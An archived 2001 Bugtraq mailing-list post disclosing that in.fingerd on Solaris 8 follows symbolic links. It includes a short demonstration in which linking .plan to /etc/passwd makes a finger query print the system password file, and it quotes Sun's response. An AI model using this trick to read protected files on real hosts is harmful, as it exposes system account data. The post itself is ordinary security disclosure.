in.fingerd follows sym-links on Solaris 8

From: Lukasz Luzar (lluzarat_private)
Date: Thu May 24 2001 - 09:14:59 PDT

Next message: bugtraq@blue-ferret.com.au: "Nortan Antivirus 2000 Poproxy.exe problem"

Previous message: Siberian: "IPC@Chip Security"
Reply: Lyndon Nerenberg: "Re: in.fingerd follows sym-links on Solaris 8"
Reply: Lukasz Luzar: "Re: in.fingerd follows sym-links on Solaris 8"
Reply: Darren Moffat: "Re: in.fingerd follows sym-links on Solaris 8"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello,

 Solaris 8 is still vulnerable to the old bug in in.fingerd daemon.

 lluzar@sun:~ (101) > ln -s /etc/passwd .plan
 lluzar@sun:~ (102) > finger -l lluzarat_private
 [localhost]
 Login name: lluzar             In real life: Lukasz Luzar
 Directory: /home/lluzar        Shell: /bin/tcsh
 On since May 19 20:17:04 on pts/70 from unix.developers.of.pl
 Mail last read Sat May 19 13:51:12 2001
 Plan:
 root:x:0:1:Super-User:/root:/sbin/sh
 daemon:x:1:1::/:
 bin:x:2:2::/usr/bin:
 sys:x:3:3::/:
 .
 .

 I believe it could be dangeours in some cases, but people from
 Sun says that they won't repair the in.fingerd because:

 "There are may be legitimate reasons for finger to follow symlinks. If
 finger is considered a security issue, it can be disabled. (..)"

 What do you think ?

Cheers,

--
Lukasz Luzar
http://Developers.of.PL/
Crede quod habes, et habes

Next message: bugtraq@blue-ferret.com.au: "Nortan Antivirus 2000 Poproxy.exe problem"
Previous message: Siberian: "IPC@Chip Security"
Reply: Lyndon Nerenberg: "Re: in.fingerd follows sym-links on Solaris 8"
Reply: Lukasz Luzar: "Re: in.fingerd follows sym-links on Solaris 8"
Reply: Darren Moffat: "Re: in.fingerd follows sym-links on Solaris 8"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu May 24 2001 - 10:19:31 PDT